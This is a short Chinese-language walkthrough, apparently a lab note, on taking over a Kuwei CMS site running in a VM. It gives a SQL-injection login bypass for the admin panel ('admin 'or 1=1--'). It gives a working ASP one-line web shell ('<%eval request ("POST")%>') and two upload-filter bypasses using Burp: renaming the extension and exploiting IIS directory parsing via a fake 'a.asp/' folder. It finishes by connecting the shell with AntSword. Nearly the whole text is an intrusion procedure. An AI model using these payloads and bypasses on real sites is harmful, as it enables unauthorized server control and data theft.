一句话木马——上传+绕过

前期准备

软件:burp,中国蚁剑

环境:酷维网站,VM虚拟机

具体操作

1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(一句话木马上传点)

2.调出属性,修改为IP,应用后确定

3.用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面

使用万能密码 账号:admin 'or 1=1-- 密码:任意

进入后去添加公告里找上传点

4.打开burpsuit,配置一下proxy(switchy omega)


上传+绕过有两个方法

方法1

制作一句话木马图片(传前格式验证)

参考------https://blog.csdn.net/weixin_45571987/article/details/115426542

访问上传路径,上传成功

后台数据库也有显示

这里有点问题,jpg蚁剑连不了,要php格式的文件,连接失败

这种适合传前格式验证,上传后bp抓包改jpg后缀为php才能用蚁剑连接


方法2

burp绕过(传后格式验证)

制作1.asp一句话木马

文本输入<%eval request ("POST")%> 另存为

在1.asp文件里一句话木马前面多加一些文字信息------为了使文件容量变大,要不然网站识别不了

上传后抓包,修改文件路径为bookpic/a.asp/,再修改文件上传后缀为jpg,放行,拦截关闭

访问路径:IP/bookpic/a.asp/20246215171536061.jpg

没有显示php代码说明解析成功

中国蚁剑连接成功